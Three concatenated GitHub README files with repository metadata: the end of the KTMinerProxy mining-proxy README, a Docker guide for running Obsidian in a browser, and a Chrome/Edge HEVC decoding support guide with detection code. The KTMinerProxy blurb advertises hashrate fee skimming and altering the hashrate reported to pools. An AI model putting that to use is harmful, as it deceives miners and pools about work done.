<p>A more common cause is a local attack, which is very easy to run into but hard to diagnose. Create a pure-forwarding port in KT and use it to test the device's 24-hour average. If even the pure-forwarding port falls short over 24 hours, a local attack is likely, and reinstalling a clean system will solve the problem.</p>

# Disclaimer

<p id="flsm">
The developer maintains this software purely out of technical interest, and it only validates a technical process. Follow your local laws before use; use is prohibited wherever it is not allowed. Any legal problems arising from the use of this software have nothing to do with the author.
</p>

# Contact us

<p>Telegram: <a href="https://t.me/rustkt">https://t.me/rustkt</a></p>
<p>Discord: <a href="https://discord.gg/NCsx4y8AR9">https://discord.gg/NCsx4y8AR9</a></p>

<p align="right">(<a href="#top">back to top</a>)</p>

[contributors-shield]: https://img.shields.io/github/contributors/kt007007/KTMinerProxy.svg?style=flat
[contributors-url]: https://github.com/kt007007/KTMinerProxy/graphs/contributors
[forks-shield]: https://img.shields.io/github/forks/kt007007/KTMinerProxy.svg?style=flat
[forks-url]: https://github.com/kt007007/KTMinerProxy/network/members
[stars-shield]: https://img.shields.io/github/stars/kt007007/KTMinerProxy.svg?style=flat
[stars-url]: https://github.com/kt007007/KTMinerProxy/stargazers
[issues-shield]: https://img.shields.io/github/issues/kt007007/KTMinerProxy.svg?style=flat
[issues-url]: https://github.com/kt007007/KTMinerProxy/issues
[license-shield]: https://img.shields.io/github/license/kt007007/KTMinerProxy.svg?style=flat
MinerProxy mining-pool relay. The original MinerProxy, the only genuine version; high performance and full-featured, handling 9000 devices without strain or crashes. Loss-free fee skimming for all coins (BTC, ETC, ETH, LTC, etc.), soft anti-CC protection, dynamic-difficulty fee skimming, and no memory blow-ups. Supports forwarding and encryption for the vast majority of coins, custom fee skimming, 24-hour statistics accurate to the individual device, a custom tunnel push tool, modification of the locally reported pool hashrate, and more.
minerproxy,miner,ktminer,ethproxy,btcproxy,poolproxy,ktproxy,btc,eth,ethereum
47
1
0
402
29
1
0
sytone/obsidian-remote
# obsidian-remote

This docker image allows you to run [obsidian](https://obsidian.md/) in docker as a container and access it via your web browser.

Use `http://localhost:8080/` to access it locally; do not expose this to the web unless you secure it and know what you are doing!!

- [Using the Container](#using-the-container)
  - [Ports](#ports)
  - [Mapped Volumes](#mapped-volumes)
  - [Environment Variables](#environment-variables)
- [Using Docker Compose](#using-docker-compose)
- [Enabling GIT for the obsidian-git plugin](#enabling-git-for-the-obsidian-git-plugin)
  - [Docker CLI example](#docker-cli-example)
- [Reloading Obsidian in the Browser](#reloading-obsidian-in-the-browser)
- [Setting PUID and PGID](#setting-puid-and-pgid)
- [Adding missing fonts](#adding-missing-fonts)
  - [Map font file using Docker CLI](#map-font-file-using-docker-cli)
  - [Map font file using Docker Compose](#map-font-file-using-docker-compose)
- [Hosting behind a reverse proxy](#hosting-behind-a-reverse-proxy)
  - [Example nginx configuration](#example-nginx-configuration)
- [Hosting behind Nginx Proxy Manager (NPM)](#hosting-behind-nginx-proxy-manager-npm)
- [Updating Obsidian](#updating-obsidian)
- [Building locally](#building-locally)
- [Copy/Paste From External Source](#copypaste-from-external-source)

## Using the Container

To run an interactive version to test it out. This uses Windows-based paths; update them for the OS you are running on.

```PowerShell
docker run --rm -it `
  -v D:/ob/vaults:/vaults `
  -v D:/ob/config:/config `
  -p 8080:8080 `
  ghcr.io/sytone/obsidian-remote:latest
```

To run it as a daemon in the background.

```PowerShell
docker run -d `
  -v D:/ob/vaults:/vaults `
  -v D:/ob/config:/config `
  -p 8080:8080 `
  ghcr.io/sytone/obsidian-remote:latest
```

The ARM container is now available; this will be made simpler in the future. The ARM image is on Docker Hub and not the GitHub container registry.

```PowerShell
docker run -d `
  -v D:/ob/vaults:/vaults `
  -v D:/ob/config:/config `
  -p 8080:8080 `
  sytone/obsidian-remote:latest
```

### Ports

| Port | Description                  |
| ---- | ---------------------------- |
| 8080 | HTTP Obsidian Web Interface  |
| 8443 | HTTPS Obsidian Web Interface |

### Mapped Volumes

| Path      | Description                                                                |
| --------- | -------------------------------------------------------------------------- |
| `/vaults` | The location on the host for your Obsidian Vaults                          |
| `/config` | The location to store Obsidian configuration and ssh data for obsidian-git |

### Environment Variables

| Environment Variable | Description |
| -------------------- | ----------- |
| PUID | Set the user ID for the container user. `911` by default. |
| PGID | Set the group ID for the container user. `911` by default. |
| TZ | Set the time zone for the container; should match your TZ. `Etc/UTC` by default. See [List of tz database time zones](https://en.wikipedia.org/wiki/List_of_tz_database_time_zones) for valid options. |
| DOCKER_MODS | Use to add mods to the container, like git. E.g. `DOCKER_MODS=linuxserver/mods:universal-git`. See [Docker Mods](https://github.com/linuxserver/docker-mods) for details. |
| KEYBOARD | Used to set the keyboard being used for input. E.g. `KEYBOARD=en-us-qwerty` or `KEYBOARD=de-de-qwertz`; a list of other possible values (not tested) can be found at <https://github.com/linuxserver/docker-digikam#keyboard-layouts> |
| CUSTOM_PORT | Internal port the container listens on for HTTP if it needs to be swapped from the default 3000. |
| CUSTOM_HTTPS_PORT | Internal port the container listens on for HTTPS if it needs to be swapped from the default 3001. |
| CUSTOM_USER | HTTP Basic auth username; `abc` is the default. |
| PASSWORD | HTTP Basic auth password; `abc` is the default. If unset there will be no auth. |
| SUBFOLDER | Subfolder for the application if running behind a subfolder reverse proxy; needs both slashes, i.e. `/subfolder/`. |
| TITLE | The page title displayed in the web browser; default "KasmVNC Client". |
| FM_HOME | The home (landing) directory for the file manager; default "/config". |
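For example, a hypothetical run that turns on HTTP basic auth using the variables above (`myuser` / `mypassword` are placeholders; substitute your own values):

```PowerShell
docker run -d `
  -v D:/ob/vaults:/vaults `
  -v D:/ob/config:/config `
  -p 8080:8080 `
  -e CUSTOM_USER=myuser `
  -e PASSWORD=mypassword `
  ghcr.io/sytone/obsidian-remote:latest
```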
## Using Docker Compose

```YAML
services:
  obsidian:
    image: 'ghcr.io/sytone/obsidian-remote:latest'
    container_name: obsidian-remote
    restart: unless-stopped
    ports:
      - 8080:8080
      - 8443:8443
    volumes:
      - /home/obsidian/vaults:/vaults
      - /home/obsidian/config:/config
    environment:
      - PUID=1000
      - PGID=1000
      - TZ=America/Los_Angeles
      - DOCKER_MODS=linuxserver/mods:universal-git
      - CUSTOM_PORT="8080"
      - CUSTOM_HTTPS_PORT="8443"
      - CUSTOM_USER=""
      - PASSWORD=""
      - SUBFOLDER=""
```

## Enabling GIT for the obsidian-git plugin

This container uses the base images from linuxserver.io, which means you can use the linuxserver.io mods. To add support for git, add the `DOCKER_MODS` environment variable like so: `DOCKER_MODS=linuxserver/mods:universal-git`.

### Docker CLI example

```PowerShell
docker run -d `
  -v D:/ob/vaults:/vaults `
  -v D:/ob/config:/config `
  -p 8080:8080 `
  -e DOCKER_MODS=linuxserver/mods:universal-git `
  ghcr.io/sytone/obsidian-remote:latest
```

## Reloading Obsidian in the Browser

If you make changes to plugins or do updates that require Obsidian to be restarted, you don't have to stop and start the docker container: just close the Obsidian UI, right click to show the menus, and reopen it. Here is a short clip showing how to do it.

![Reloading Obsidian in the Browser](./assets/ReloadExample.gif)

## Setting PUID and PGID

To set PUID and PGID, use the following environment variables on the command line; by default the IDs are 911/911.

```PowerShell
docker run --rm -it `
  -v D:/ob/vaults:/vaults `
  -v D:/ob/config:/config `
  -e PUID=1000 `
  -e PGID=1000 `
  -p 8080:8080 `
  ghcr.io/sytone/obsidian-remote:latest
```

Or, if you use docker-compose, add them to the environment: section:

```yaml
environment:
  - PUID=1000
  - PGID=1000
```

You will most likely want to use your own user's IDs, which can be obtained by running the command below. The two values you are interested in are the uid and gid.

```powershell
id $user
```

## Adding missing fonts

Thanks to @aaron-jang for this example. Download the font of the language that you want to use in Obsidian and add it to the volume as shown below.

### Map font file using Docker CLI

```PowerShell
-v {downloaded font directory}:/usr/share/fonts/truetype/{font name}
```

### Map font file using Docker Compose

```PowerShell
volumes:
  - {downloaded font directory}:/usr/share/fonts/truetype/{font name}
```
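One hypothetical way to confirm the container picked the font up, assuming the `obsidian-remote` container name from the compose example above and that `fc-list` (fontconfig) is available inside the image, with "Noto" standing in for your font's name:

```PowerShell
docker exec obsidian-remote fc-list | Select-String Noto
```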
## Hosting behind a reverse proxy

If you wish to do that, **please make sure you are securing it in some way!** You also need to ensure **websocket** support is enabled.

### Example nginx configuration

This is an example; I recommend an SSL-based proxy and some sort of authentication.

```
server {
  set $forward_scheme http;
  set $server "10.10.10.10";
  set $port 8080;

  listen 80;
  server_name ob.mycooldomain.com;

  proxy_set_header Upgrade $http_upgrade;
  proxy_set_header Connection $http_connection;
  proxy_http_version 1.1;

  access_log /data/logs/ob_access.log proxy;
  error_log /data/logs/ob_error.log warn;

  location / {
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection $http_connection;
    proxy_http_version 1.1;

    # Proxy!
    add_header X-Served-By $host;
    proxy_set_header Host $host;
    proxy_set_header X-Forwarded-Scheme $scheme;
    proxy_set_header X-Forwarded-Proto $scheme;
    proxy_set_header X-Forwarded-For $remote_addr;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_pass $forward_scheme://$server:$port$request_uri;
  }
}
```

## Hosting behind Nginx Proxy Manager (NPM)

Thanks to @fahrenhe1t for this example. If you install obsidian-remote in Docker, you can proxy it through [Nginx Proxy Manager](https://nginxproxymanager.com/) (NPM - running on the same Docker instance) and use an access list to provide user authentication. The obsidian-remote container has to be on the same network as Nginx Proxy Manager. If you don't expose the IP outside the container, authentication is forced through NPM:

```yaml
services:
  obsidian:
    image: 'ghcr.io/sytone/obsidian-remote:latest'
    container_name: obsidian-remote
    restart: unless-stopped
    ports:
      - 8080 # only exposes the port internally to the container
    volumes:
      - /home/obsidian/vaults:/vaults
      - /home/obsidian/config:/config
    environment:
      - PUID=1000
      - PGID=1000
      - TZ=America/Los_Angeles
      - DOCKER_MODS=linuxserver/mods:universal-git
networks:
  default:
    name: <your nginx proxy manager network>
    external: true
```

Create a proxy host in NPM pointing to the "obsidian-remote:8080" container, choose your domain name, use a LetsEncrypt SSL certificate, and enable WebSockets. This video talks about it: [Nginx Proxy Manager - ACCESS LIST protection for internal services](https://www.youtube.com/watch?v=G9voYZejH48)

## Updating Obsidian

By default Obsidian will update itself in the container. If you recreate the container you will have to do the update again. This repo will be updated periodically to keep up with the latest version of Obsidian.

## Building locally

To build and use it locally, run the following commands:

```PowerShell
docker build --pull --rm `
  -f "Dockerfile" `
  -t obsidian-remote:latest `
  "."
```

To run the locally built image:

```PowerShell
docker run --rm -it `
  -v D:/ob/vaults:/vaults `
  -v D:/ob/config:/config `
  -p 8080:8080 `
  obsidian-remote:latest bash
```

## Copy/Paste From External Source

Click on the circle on the left side of your browser window. In there you will find a textbox for updating the remote clipboard or copying from it.

![image](https://user-images.githubusercontent.com/1399443/202805847-a87e2c7c-a5c6-4dea-bbae-4b25b4b5866a.png)
Run Obsidian.md in a browser via a docker container.
obsidian-md
6
6
28
61
39
3
2
StaZhu/enable-chromium-hevc-hardware-decoding
# enable-chromium-hevc-hardware-decoding

A guide that teaches you how to enable hardware HEVC decoding & encoding for Chrome / Edge, or how to build a custom version of Chromium / Electron that supports hardware & software HEVC decoding and hardware HEVC encoding.

##### English | [็ฎ€ไฝ“ไธญๆ–‡](./README.zh_CN.md)

## Usage

#### Chrome & Edge (Mac) & Chromium

Make sure the version is >= 107, then open it directly.

## What's the hardware decoding supported HEVC profile?

HEVC Main (up to 8192x8192 pixels)

HEVC Main 10 (up to 8192x8192 pixels)

HEVC Main Still Picture (only Windows is not supported; up to 8192x8192 pixels)

HEVC Rext (partially supported, see the table below for details; up to 8192x8192 pixels)

| GPU | 8b 420 | 8b 422 | 8b 444 | 10b 420 | 10b 422 | 10b 444 | 12b 420 | 12b 422 | 12b 444 |
| :--------------------- | :----- | :------------- | :------------- | :------- | :------ | :------ | :------ | :------------ | :------------- |
| Apple Silicon (macOS) | โœ… | โœ… | โœ… | โœ… | โœ… | โœ… | โŒ | โŒ | โŒ |
| Intel ICL ~ TGLx (Win) | โœ… |โœ…<sup>[5]</sup>|โœ…<sup>[4]</sup>| โœ… | โœ… | โœ… | โŒ | โŒ | โŒ |
| Intel TGLx+ (Win) | โœ… |โœ…<sup>[5]</sup>|โœ…<sup>[4]</sup>| โœ… | โœ… | โœ… | โœ… |โœ…<sup>[4]</sup>|โœ…<sup>[4]</sup>|

โœ…: GPU + software support

โŒ: GPU not supported

*Note 1: Intel Macs support HEVC Rext software decoding of 8 ~ 12b 400, 420, 422, 444 content. Apple Silicon Macs support HEVC Rext hardware decoding of 8 ~ 10b 400, 420, 422, 444 content, and software decoding of 12b 400, 420, 422, 444 content on macOS 13+.*

*Note 2: Intel Gen10 GPUs support HEVC Rext hardware decoding of 8b 420, 8b 422, 8b 444, 10b 420, 10b 422, 10b 444 content on Windows. Gen11+ GPUs additionally support HEVC Rext hardware decoding of 12b 420, 12b 422, 12b 444 content.*

*Note 3: Although NVIDIA GPUs support HEVC Rext hardware decoding of 8 ~ 12b non-422 content via CUVID or NVDEC, they do not provide a D3D11 interface, so Chromium will not support it in the future.*

*Note 4: HEVC 8b 444, 12b 422, 12b 444 support requires Chrome >= `117.0.5866.0`.*

*Note 5: HEVC 8b 422 support requires Chrome >= `118.0.5956.0`.*

*Note 6: Retaining the original 4:2:2/4:4:4 chroma sampling requires Chrome >= `125.0.6408.0`.*

## What's the hardware encoding supported HEVC profile?

HEVC Main (macOS & Windows & Android; macOS up to 4096x2304 px & 120 fps, Windows up to 1920x1088 px & 30 fps, Android up to the hardware's limit)

*Note 1: You need to pass a Chrome switch to enable it (`--enable-features=PlatformHEVCEncoderSupport`). [Test Page](https://w3c.github.io/webcodecs/samples/encode-decode-worker/index.html).*

*Note 2: Windows / Mac need Chrome version >= `109.0.5397.0`; Android needs Chrome version >= `117.0.5899.0`.*

## What's the OS requirement?

macOS Big Sur (11.0) and above

Windows 8 and above

Android 5.0 and above

Chrome OS (only supports GPUs that support the VAAPI interface, e.g. Intel GPUs)

Linux (Chrome version >= `108.0.5354.0`, and only GPUs that support the VAAPI interface, e.g. Intel GPUs)

## What's the API supported?

Video Decode: File, Media Source Extensions, WebCodecs (8 bit requires >= `107.0.5272.0`, 10 bit + HEVC with alpha requires >= `108.0.5343.0`), and Encrypted Media Extensions with Clearkey and Widevine L1 (HW only) are supported. WebRTC is not supported.

Video Encode: WebCodecs (Windows, macOS, and Android, when passing `--enable-features=PlatformHEVCEncoderSupport`) is supported.
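As a quick probe of that encoder path, a minimal WebCodecs sketch (run from a page or DevTools after launching the browser with the switch above; the codec string, resolution, and bitrate here are illustrative, not requirements):

```javascript
// Probe WebCodecs HEVC encode support; assumes the browser was launched with
// --enable-features=PlatformHEVCEncoderSupport.
const { supported } = await VideoEncoder.isConfigSupported({
  codec: 'hev1.1.6.L120.B0', // HEVC Main, illustrative level
  width: 1920,
  height: 1080,
  bitrate: 5_000_000,
  framerate: 30,
});
console.log(supported ? 'HEVC encoding is available!' : 'HEVC encoding is not available!');
```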
## What's the GPU requirement?

#### Discrete GPU

Intel DG1 and above

NVIDIA GT635, GTX645 and above

AMD RX460 and above

#### Integrated GPU

Intel HD4400, HD515 and above

AMD Radeon R7, Vega M and above

Apple M1, M1 Pro, M1 Max, M1 Ultra and above

#### Detail Table

[Intel](https://bluesky-soft.com/en/dxvac/deviceInfo/decoder/intel.html)

[AMD](https://bluesky-soft.com/en/dxvac/deviceInfo/decoder/amd.html)

[NVIDIA](https://bluesky-soft.com/en/dxvac/deviceInfo/decoder/nvidia.html)

## HDR Supports? (Compared with Edge / Safari / Firefox)

| | PQ | HDR10 | HDR10+ | HLG | DV P5 | DV P8.1 | DV P8.4 |
| :-------------- | :------- | :------- | :------- | :------- |:-------- |:--------- |:----------- |
| Chrome Mac | โœ… | โœ… | โœ… | โœ… | โŒ | โœ… | โœ… |
| Chrome Win | โœ… | โœ… | โœ… | โœ… | โŒ | โœ… | โœ… |
| Edge Mac | โœ… | โœ… | โœ… | โœ… | โŒ | โœ… | โœ… |
| Edge Win | โœ… | โœ… | โœ… | โœ… | โŒ | โœ… | โœ… |
| Safari Mac | โœ… | โœ… | โœ… | โœ… | โœ… | โœ… | โœ… |
| Firefox Win<sup>[1]</sup>| โŒ | โŒ | โŒ | โŒ | โŒ | โŒ | โŒ |

On the Windows platform, Chrome supports PQ, HDR10 (PQ with static metadata), and HLG. Automatic tone-mapping will be enabled based on static metadata (if present). HDR10+ SEI dynamic metadata will be ignored while decoding, and playback will downgrade to HDR10.

On the macOS platform, Chrome supports PQ, HDR10 (PQ with static metadata), and HLG. In SDR / HDR / Hybrid mode, macOS will automatically perform EDR to ensure that HDR is displayed correctly.

Chrome / Edge share the same code and thus have the same decoding ability; Safari also supports all of the above HDR formats.

*Note 1: Firefox >= 120 just added HEVC decoding support (Windows platform only, experimental; you need to manually set `media.wmf.hevc.enabled=1` to enable the feature). Based on my testing, Firefox supports the HEVC Main profile but doesn't support the Main10 profile yet (HDR content is usually encoded with the Main10 profile); if the bug gets fixed, I will re-test and update the table later.*

#### Dolby Vision Support Status

There are two types of support here:

1. Type 1: Supports RPU dynamic metadata and Profile 5 (IPTPQc2).
2. Type 2: Supports profiles like Profile 8/9 that have cross-compatible HDR10/HLG/SDR support.

For the first type, currently only Chromecast and Windows platforms have very limited support. On the Windows platform, Chrome supports encrypted Dolby Vision content: for Chrome >= 110, when the `--enable-features=PlatformEncryptedDolbyVision` switch is passed at launch and the system has the Dolby Vision extension and HEVC Video Extensions installed, Profile 4/5/8 will be supported, and "Supported" will be returned when querying the API. (Note: for external HDR displays with HDR mode turned on, Microsoft's MediaFoundation has a bug and will not return "Supported".)

For the second type, Profile 8/9 with cross-compatibility such as HLG, HDR10, and SDR: querying the API with `dvh1`, `dvhe`, `dva1`, `dvav` will return "not supported" (for example: `MediaSource.isTypeSupported('video/mp4;codecs="dvh1.08.07"')`), while querying with `hvc1`, `hev1`, `avc1`, `avc3` will return "supported".

The specific version of Chrome has different implementation details:

Chrome >= 122: as long as the platform supports HEVC, it is supported. Assuming the API used by developers is MSE, the logic is something like below:
```javascript
if (isTypeSupported('video/mp4;codecs="dvh1.08.07"')) {
  if (use_rpu) {
    // Playback should succeed. Chrome internally considers the codec to be Dolby Vision
    // and uses RPU dynamic metadata.
    source.addSourceBuffer('video/mp4;codecs="dvh1.08.07"');
    ...
  } else if (dvcc.dv_bl_signal_compatibility_id === 1 ||
             dvcc.dv_bl_signal_compatibility_id === 2 ||
             dvcc.dv_bl_signal_compatibility_id === 4) {
    // Playback should succeed. Chrome internally considers the codec to be HEVC,
    // ignores RPU dynamic metadata, and decodes and renders in HLG/HDR10/SDR mode.
    // Note: if it is profile 5, the source buffer can only be created with a `dvh1` or
    // `dvhe` mimetype.
    source.addSourceBuffer('video/mp4;codecs="hev1.2.4.L120.90"');
    ...
  } else {
    // Playback should fail: for incompatible Dolby profiles, constructing the source
    // buffer as HEVC always fails.
  }
} else if (isTypeSupported('video/mp4;codecs="hev1.2.4.L120.90"')) {
  if (dvcc.dv_bl_signal_compatibility_id === 1 ||
      dvcc.dv_bl_signal_compatibility_id === 2 ||
      dvcc.dv_bl_signal_compatibility_id === 4) {
    // Playback should succeed. Chrome internally considers the codec to be HEVC,
    // ignores RPU dynamic metadata, and decodes and renders in HLG/HDR10/SDR mode.
    source.addSourceBuffer('video/mp4;codecs="hev1.2.4.L120.90"');
    ...
  } else {
    // Playback should fail, for example when Chrome does not support profile 5 but you
    // construct the SourceBuffer as HEVC.
  }
} else {
  // Playback should fail: HEVC is not supported.
}
```

For versions 110 ~ 121 of Chrome on Windows, Dolby Vision is not playable at all if it's not encrypted; this is a browser bug.

For Chrome on other platforms, such as macOS and Android, as long as the source buffer is constructed with `hvc1`, `hev1`, `avc1`, `avc3` and the sample entry is not `dvh1`, `dvhe`, `dva1`, `dvav`, playback should succeed.

For versions 107 ~ 109 of Chrome, if the source buffer is constructed with `hvc1`, `hev1`, `avc1`, `avc3` and the sample entry is not `dvh1`, `dvhe`, `dva1`, `dvav`, playback should succeed.

#### HDR support by version of Chrome/Edge

Chrome 107 does not support extracting HEVC static metadata, and all HDR10 video playback is downgraded to PQ-only mode. HLG video uses the GPU vendor's video processor API for tone-mapping, which performs poorly on some laptops, and playing 4K video may drop frames.

Chrome 108 supports extracting HEVC static metadata. For videos with static metadata written into the container, playback is fine on 108, but some videos do not write static metadata to their containers, so Chrome 108 cannot extract it; playback of those videos is downgraded to PQ-only mode, and the max content light level may be cut to a low value. In addition, the HLG tone-mapping algorithm on Windows was switched to Chrome's own algorithm, which solves the poor laptop performance of video-processor HLG tone-mapping. However, Chrome was still tone-mapping in 8 bit, resulting in insufficient contrast in the tone-mapped output.

Chrome 109 makes the HDR -> SDR pipeline a 16 bit + zero-copy process, which improves the accuracy of PQ tone-mapping on Windows; this also solves the insufficient-contrast problem for HLG, and video memory usage has been reduced by about 50%.

Chrome 110 solves the problem of incomplete static metadata extraction.
It supports extracting static metadata from both the bitstream and the container, so the max content light level issue is solved; at this point all HDR issues should have been resolved.

Chrome 119 fixed 10 bit video playback issues for AMD GPUs on the Windows platform (black screen when playing HLG video in SDR mode, 4K freezes, high memory usage, color changes when switching full-screen, crashes when playing SDR video in HDR mode).

Chrome 122 improved Dolby Vision cross-compatible playback.

Chrome 123 ensures that on Windows, PQ/HDR10 video is rendered at absolute brightness when system HDR mode is enabled. It also solves abnormal tone-mapping when a window is dragged between SDR and HDR monitors in a multi-monitor setup.

Chrome 124 solves the issue that, on Windows with the NVIDIA RTX Auto HDR feature enabled, page scrolling caused abrupt changes in video brightness.

Chrome 125 solves all issues with Intel HDR10 MPO, and the feature has been re-enabled.

Edge 125 solves the lack of zero-copy output when `VDAVideoDecoder` decodes HEVC Main10 10 bit content on Windows, which also fixes bad PQ/HDR10/HLG tone-mapping results. The HDR rendering results of later Edge versions are expected to be exactly the same as Chrome's, performed by Skia, and the rendering results of the various GPU vendors will remain consistent whether system HDR mode is on or off (Intel HDR10 MPO may be enabled if system HDR mode is on and the GPU generation is >= 11, which may result in slight inconsistencies with Skia's rendering).

## How to verify a certain profile or resolution is supported?

### Clear Content

#### MediaCapabilities
```javascript
const mediaConfig = {
  /**
   * You can use `file` or `media-source` here; the result is the same.
   * Don't use `webrtc`, since HEVC WebRTC is not supported currently.
   */
  type: 'file',
  video: {
    /**
     * HEVC Profile
     *
     * Main: `hev1.1.6.L93.B0`
     * Main 10: `hev1.2.4.L93.B0`
     * Main still-picture: `hvc1.3.E.L93.B0`
     * Range extensions: `hvc1.4.10.L93.B0`
     */
    contentType: 'video/mp4;codecs="hev1.1.6.L120.90"',
    /* Width */
    width: 1920,
    /* Height */
    height: 1080,
    /* Any number */
    bitrate: 10000,
    /* Any number */
    framerate: 30
  }
}

navigator.mediaCapabilities.decodingInfo(mediaConfig)
  .then(result => {
    /* Indicates whether the video with the given profile, width, and height can be played well on this browser */
    if (result.supported) {
      console.log('Video can play!');
    } else {
      console.log('Video can\'t play!');
    }
  });
```

#### MediaSource

```javascript
if (MediaSource.isTypeSupported('video/mp4;codecs="hev1.1.6.L120.90"')) {
  console.log('HEVC main profile is supported!');
}

if (MediaSource.isTypeSupported('video/mp4;codecs="hev1.2.4.L120.90"')) {
  console.log('HEVC main 10 profile is supported!');
}

if (MediaSource.isTypeSupported('video/mp4;codecs="hev1.3.E.L120.90"')) {
  console.log('HEVC main still-picture profile is supported!');
}

if (MediaSource.isTypeSupported('video/mp4;codecs="hev1.4.10.L120.90"')) {
  console.log('HEVC range extensions profile is supported!');
}
```

#### CanPlayType

```javascript
const video = document.createElement('video');

if (video.canPlayType('video/mp4;codecs="hev1.1.6.L120.90"') === 'probably') {
  console.log('HEVC main profile is supported!');
}

if (video.canPlayType('video/mp4;codecs="hev1.2.4.L120.90"') === 'probably') {
  console.log('HEVC main 10 profile is supported!');
}

if (video.canPlayType('video/mp4;codecs="hev1.3.E.L120.90"') === 'probably') {
  console.log('HEVC main still-picture profile is supported!');
}

if (video.canPlayType('video/mp4;codecs="hev1.4.10.L120.90"') === 'probably') {
  console.log('HEVC range extensions profile is supported!');
}
```

#### VideoDecoder

```javascript
const videoConfig = {
  /**
   * HEVC Profile
   *
   * Main: `hev1.1.6.L93.B0`
   * Main 10: `hev1.2.4.L93.B0`
   * Main still-picture: `hvc1.3.E.L93.B0`
   * Range extensions: `hvc1.4.10.L93.B0`
   */
  codec: 'hev1.1.6.L120.90',
  /* HEVC is always hw accelerated */
  hardwareAcceleration: 'prefer-hardware',
  /* Width */
  codedWidth: 1280,
  /* Height */
  codedHeight: 720,
}

try {
  const result = await VideoDecoder.isConfigSupported(videoConfig);
  /* Indicates whether the video with the given profile, width, and height can be decoded by the WebCodecs API */
  if (result.supported) {
    console.log('Video can play!');
  } else {
    console.log('Video can\'t play!');
  }
} catch (e) {
  /* In previous versions of Chromium there is a bug where the API may throw an Error if the config is not supported */
  console.log('Video can\'t play!');
}
```

*Note 1: The above four APIs already take `--disable-gpu`, `--disable-accelerated-video-decode`, GPU workarounds, `settings - system - Use hardware acceleration when available`, the OS version, etc. into consideration, and if the Chrome version is >= `107.0.5304.0` (there is a bug in Chrome 108 and earlier on the Windows platform:
if a specific GPU driver version causes D3D11VideoDecoder to be disabled for some reason, APIs such as isTypeSupported may still return "supported" even though hardware decoding is no longer available; the bug was fixed in Chrome 109) and the OS is macOS or Windows, the results are guaranteed.*

*Note 2: There is a bug on the Android platform: Chrome < `112.0.5612.0` does not return the actual support status of different devices (although Android >= 5.0 supports HEVC Main profile SW decoding by default, whether the Main10 profile is supported depends entirely on the hardware) and always assumes that all HEVC profiles and resolutions are supported. Chrome >= `112.0.5612.0` fixes this bug and returns the correct result based on the hardware and the given video's resolution. Just like on Windows and macOS, the above APIs are supported as well, and every influencing factor should have been taken into account.*

*Note 3: Compared with `MediaSource.isTypeSupported()` or `canPlayType()`, we recommend using `MediaCapabilities`, since `MediaCapabilities` not only takes `settings - system - Use hardware acceleration when available` etc. into consideration, but also checks whether the given width and height are supported, since different GPUs may have different maximum supported resolutions; e.g. some AMD GPUs only support up to 4096x2048, and some old GPUs only support up to 1080p.*

### Encrypted Content

#### requestMediaKeySystemAccess

```javascript
/** Detect HEVC Widevine L1 support (only Windows is supported). */
try {
  await navigator.requestMediaKeySystemAccess('com.widevine.alpha.experiment', [
    {
      initDataTypes: ['cenc'],
      distinctiveIdentifier: 'required',
      persistentState: 'required',
      sessionTypes: ['temporary'],
      videoCapabilities: [
        {
          robustness: 'HW_SECURE_ALL',
          contentType: 'video/mp4; codecs="hev1.1.6.L120.90"',
        },
      ],
    },
  ]);
  console.log('Widevine L1 HEVC main profile is supported!');
} catch (e) {
  console.log('Widevine L1 HEVC main profile is not supported!');
}

/**
 * Detect Dolby Vision Widevine L1 support (only Windows is supported, and only if
 * the `--enable-features=PlatformEncryptedDolbyVision` switch has been passed).
 */
try {
  await navigator.requestMediaKeySystemAccess('com.widevine.alpha.experiment', [
    {
      initDataTypes: ['cenc'],
      distinctiveIdentifier: 'required',
      persistentState: 'required',
      sessionTypes: ['temporary'],
      videoCapabilities: [
        {
          robustness: 'HW_SECURE_ALL',
          contentType: 'video/mp4; codecs="dvhe.05.07"',
        },
      ],
    },
  ]);
  console.log('Widevine L1 DV profile 5 is supported!');
} catch (e) {
  console.log('Widevine L1 DV profile 5 is not supported!');
}
```

## What's the tech diff? (Compared with Edge / Safari / Firefox)

#### Windows

Edge uses `VDAVideoDecoder` to call `MFT` (you need to install the `HEVC Video Extensions`; Edge 117 ~ 121 used `MediaFoundationRenderer` and switched back to the original `VDAVideoDecoder` in version 122) to do HEVC decoding, which is the same tech behind the built-in `Movies and TV` system app.

Firefox (>= 120, experimental; you need to manually set `media.wmf.hevc.enabled=1` to enable the feature) uses `MFT` (you need to install the `HEVC Video Extensions`) to do HEVC decoding, which is the same tech behind the built-in `Movies and TV` system app.

When using `MFT`, if the device does not have hardware decoding support for a specific profile (e.g. NVIDIA GTX 745 does not support the Main10 profile) or resolution (e.g. NVIDIA GTX 960 does not support resolutions above 4K), `MFT` will automatically switch to software decoding.
Chrome uses `D3D11VideoDecoder` to call `D3D11VA` (no need to install anything) to do HEVC hardware decoding, which is the same tech behind video players like `VLC`.

#### macOS

Edge and Chrome use the same decoding implementation on macOS.

Safari and Chrome use the same `VideoToolbox` to do HEVC decoding; if the device does not have hardware support, it automatically falls back to software decoding. Compared with Safari, Chrome requires a higher OS version (10.13 vs 11.0).

## How to verify HEVC hardware support is enabled?

1. Open `chrome://gpu` and search for `Video Acceleration Information`. You should see the **Decode hevc main** and **Decode hevc main 10** fields if hardware decoding is supported (macOS will also show **Decode hevc main still-picture** and **Decode hevc range extensions**; Windows Intel Gen10+ iGPUs will also show **Decode hevc range extensions**). macOS is an exception here: seeing these fields doesn't mean decoding will use hardware; that actually depends on your GPU.
2. Open `chrome://media-internals` and play some HEVC video ([Test Page](https://lf-tk-sg.ibytedtos.com/obj/tcs-client-sg/resources/video_demo_hevc.html)). If the decoder is `VDAVideoDecoder`, `VideoToolboxVideoDecoder`, `D3D11VideoDecoder` or `VaapiVideoDecoder`, the video is using hardware decoding (macOS is an exception here: if the OS is >= Big Sur and the GPU doesn't support HEVC, VideoToolbox falls back to software decoding, which performs better than FFmpeg; the decoder is still reported as `VDAVideoDecoder` or `VideoToolboxVideoDecoder` in that case). If the decoder is `FFMpegVideoDecoder`, the video is using software decoding.
3. Open `Activity Monitor` on Mac and search for `VTDecoderXPCService`. If its CPU usage is larger than 0 when playing a video, hardware (or software) VideoToolbox decoding is being used.
